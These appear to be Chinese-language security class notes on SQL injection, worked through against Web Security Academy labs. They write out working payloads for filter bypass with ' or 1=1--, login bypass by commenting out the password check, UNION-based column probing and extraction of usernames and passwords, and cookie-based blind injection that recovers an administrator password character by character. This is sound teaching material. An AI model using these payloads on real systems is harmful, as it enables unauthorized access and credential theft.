資安第四堂

SQL injection

上次的題解在這:D

SQL基本語法

sqliteviz

筆記

檔案

從「Customers」選 Country = 'Mexico'的全部欄位

依哪一欄作為排序

限制回傳的數量

連結多個SELECT

SQL injection

Lab

https://123.web-security-academy.net/filter?category=Pets

SELECT * FROM products WHERE category = 'Pets' AND released = 1

category會回傳到後端進行SQL查詢

嘗試將AND released = 1用--註解掉

https://123.web-security-academy.net/filter?category=Pets'+or+1=1--

(+等於%20代表空白)

SELECT * FROM products WHERE category = 'Pets' or 1=1--' AND released = 1

Lab

SELECT * FROM users WHERE username = 'jellyfish' AND password = '12345'

用--將AND password = '12345'註解掉

SELECT * FROM users WHERE username = 'jellyfish'--' AND password = '12345'

UNION可以執行多個額外的SELECT查詢

ex:

SELECT * FROM products WHERE category = 'Pets' UNION SELECT username, password FROM user --' AND released = 1

兩個關鍵

• 每個查詢要回傳相同數量的資料列 -> 確認資料列數量
• 每個資料列的資料型態在查詢之間必須符合 -> 確認資料型態

Lab

• 利用 ORDER BY 直到發生錯誤

SELECT * FROM products WHERE category = 'Pets' ORDER BY 1 --' AND released = 1

• 利用 UNION SELECT 直到沒有錯誤

SELECT * FROM products WHERE category = 'Pets' UNION SELECT NULL--' AND released = 1

Lab

SELECT * FROM products WHERE category = 'Pets' UNION SELECT 'a',NULL,NULL,NULL--' AND released = 1

如果沒有噴錯表示該欄位為字串 ( String)

SELECT * FROM products WHERE category = 'Pets' UNION SELECT NULL,'a',NULL,NULL--' AND released = 1

通常是MSSQL 要猜

Lab

已知表 users 存在 username , password 欄位

SELECT * FROM products WHERE category = 'Pets' union SELECT username, password from users --' AND released = 1

有sql injection但沒有顯示結果or錯誤訊息

通過觸發條件回應來利用盲SQL注入

Lab

透過cookie使用者情況的網站 -> 測試是否有帳號

TrackingId = x' UNION SELECT 'a' WHERE 1=1--    ⮕ True前端有東西

TrackingId = x' UNION SELECT 'a' WHERE 1=2--   ⮕False前端沒東西

測試帳號 Administrator 是否存在

TrackingId = x' UNION SELECT 'a' FROM users WHERE username='administrator'--

Lab

可以藉由回傳之 true 或 false 將一個字元一個字元的將完整的密碼測試出來

搭配函數 SUBTRING (部分類型的資料庫中函數名為 SUBSTR )

TrackingId = x' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 'm' --

推測試第二個位元(SUBSTRING(Password, 2, 1))